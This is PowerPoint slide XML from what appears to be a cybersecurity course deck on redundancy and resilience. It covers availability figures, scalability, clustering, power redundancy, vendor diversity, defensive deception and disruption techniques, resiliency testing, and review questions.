                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="469265" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>08:45:36</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B060203050402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502725751"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="615021">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="71755" algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1290"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-25" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Two</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="449580" algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1290"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-25">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>99%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="469265" algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1290"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>87:36:00</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B060203050402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89807427"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFE7D249-5C84-DB0C-8215-25446683C1A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5594122" y="2336872"/>
            <a:ext cx="5035777" cy="3949627"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Scalability and Elasticity</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>High availability also means that a system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cancope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with rapid growth in demand. These properties are referred to as scalability and elasticity. Scalability is the capacity to increase resources to meet demand within similar cost ratios. This means that if service demand doubles, costs do not more than double. There are two types of scalability:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To scale out is to add more resources in parallel with existing resources.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To scale up is to increase the power of existing resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Fault Tolerance and Redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site Considerations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud as Disaster Recovery (DR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testing Redundancy and High Availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19729106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2F76B-7712-F10D-B8D3-E458BC593F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Clustering</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2407B57-7415-75C8-0E91-917D7408A293}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5166042" y="2420366"/>
            <a:ext cx="6482479" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where load balancing distributes traffic between independent processing nodes, clustering allows multiple redundant processing nodes that share data with one another to accept connections. This provides redundancy. If one of the nodes in the cluster stops working, connections can failover to a working node. To clients, the cluster appears to be a single server. A load balancer distributes client requests across available server nodes in a farm or pool and is generally associated with managing web traffic whereas clusters are used to provide redundancy and high- availability for systems such as databases, file servers and others.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtual IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active/Passive (A/P) and Active/Active (A/A) Clustering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Clustering</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 522">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E769DFC-DBEE-CC60-2335-0E23FF437B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="193357" y="2226310"/>
            <a:ext cx="4972685" cy="4047490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1382511027"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>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EF02A-3821-BCD4-FEC7-5983EF835F17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Power Redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C59B9F2-66DA-458B-8AE0-6B1F224298C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dual Power Supplies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Managed Power Distribution Units (PDUs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Battery Backups and Uninterruptible Power Supplies (UPSs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33514613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77EEC-5A86-6550-4770-D503CE58D786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Diversity and Defense in Depth</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{213F6E87-79DD-BB1F-60DD-9C7CCFEDA337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="2336872"/>
            <a:ext cx="9613861" cy="4317927"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Platform diversity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defense in Depth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vendor Diversity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vendor diversity is essential for several reasons, offering benefits not only in terms of cybersecurity but also in business resilience, innovation, and competition:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cybersecurity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Business Resilience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Innovation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Competition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Customization and Flexibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Risk Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multi-Cloud Strategies</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41172587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FBBCD-E93A-D51C-9398-AF94249002BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Deception Technologies</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC0C6A9A-2F5C-D02C-0AF1-65505A4645A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="2336872"/>
            <a:ext cx="10228979" cy="4317927"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>By deploying these tools, organizations can detect and monitor attacks, gather intelligence about attackers and their methods, and proactively defend against future attacks. These tools can also provide an additional layer of defense by diverting attackers’ attention away from real systems and applications, reducing the risk of successful attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Disruption Strategies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Another type of active defense uses disruption strategies. These adopt some of the obfuscation strategies used by malicious actors. The aim is to raise the attack cost and tie up the adversary’s resources. Some examples of disruption strategies include the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Using bogus DNS entries to list multiple hosts that do not exist.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Configuring a web server with multiple decoy directories or dynamically generated pages to slow down scanning.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Using port triggering or spoofing to return fake telemetry data when a host detects port scanning activity. This will result in multiple ports being falsely reported as open and slow down the scan. Telemetry can refer to any type of measurement or data returned by remote scanning. Similar fake telemetry could be used to report IP addresses as up when they are not, for instance.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Using a DNS sinkhole to route suspect traffic to a different network, such as a honeynet, where it can be analyzed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36046326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007A-0D5D-1844-2BBD-D818FCB36595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Testing Resiliency</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4157D224-A52B-C046-0ECA-6AEB92A125B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="2336872"/>
            <a:ext cx="10305179" cy="4216327"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Method of Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testing system resilience and incident response effectiveness are crucial for organizations to recover from disruptions and maintain business continuity. By conducting various tests, organizations can identify potential vulnerabilities, evaluate the efficiency of their recovery strategies, and improve their overall preparedness for real-life incidents.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tabletop Exercises</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Failover Tests </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simulations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parallel Processing Tests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Documentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22275300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26189-116B-8AA7-B3B6-5CA8CFAF4630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Redundancy Strategies</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B31C3360-6A00-BD64-A4CE-AA077DFB0C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does MTD relate to availability?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does elasticity differ from scalability?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Which two components are required to ensure power redundancy for a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>power loss period extending over 24 hours?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does RAID support fault tolerance?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24410141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21B9D-2F14-7ACA-E637-605007D792F2}"/>
              </a:ext>
